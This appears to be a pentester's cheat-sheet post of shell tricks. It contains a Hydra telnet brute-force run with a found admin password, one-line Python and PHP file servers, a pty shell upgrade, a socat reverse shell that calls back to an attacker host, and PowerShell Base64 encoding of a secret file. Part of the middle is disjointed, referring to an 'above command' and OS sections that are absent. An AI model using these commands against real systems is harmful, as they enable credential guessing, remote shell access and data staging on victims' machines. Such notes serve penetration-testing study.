Some useful tricks that could be useful to get a shell
c:\PENTEST\thc-hydra>hydra -L username.txt -P passlist.txt 10.10.10.xx telnet Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2019-03-03 19:19:13 [WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available [DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:6/p:0), ~4 tries per task [DATA] attacking telnet://10.10.10.xx:23/ [telnet] host: 10.10.10.98 login: admin password: secretpw [STATUS] 24.00 tries/min, 24 tries in 00:00h, 0 to do in 01:00h, 1 active 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2019-03-03 19:20:18
- You can setup a simple web server using Python or PHP.
python -m SimpleHTTPServer 8080
And a simple HTTP server will be listening on your 8080 TCP port.
php -S 127.0.0.1:8080
And a simple HTTP server will be listening on 127.0.0.1:8080.
- Python with “pty”:
python -c "import pty; pty.spawn('/bin/bash')"
On your localhost (attacker):
socat file:`tty`,raw,echo=0 tcp-listen:443
On your victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST_IP>:443
You will need to do all of this via the command line. Given you’re already dealing with Base64 data I am going to assume you know how to bring that up on your operating system. Scroll down to the relevant section based on your OS below, also substitute your file names as appropriate.
I am going to use .txt for the decoded data file extension and .b64 for the Base64 encoded file extension.
Note: encoding with the above command will leave a temporary file, tmp.b64, on your file system. If you do not wish to have that file present simply add this to the end of the command: && del tmp.b64
PS C:\Users\jacco> [Convert]::ToBase64String([IO.File]::ReadAllBytes( "C:\PENTEST\secret.txt")) ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr PS C:\Users\jacco>
Interesting links to read!
https://blog.ropnop.com/transferring-files-from-kali-to-windows/ (A lot of techniques to transfer files from attacker machine to a windows box)
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ (Upgrading simple shells techniques)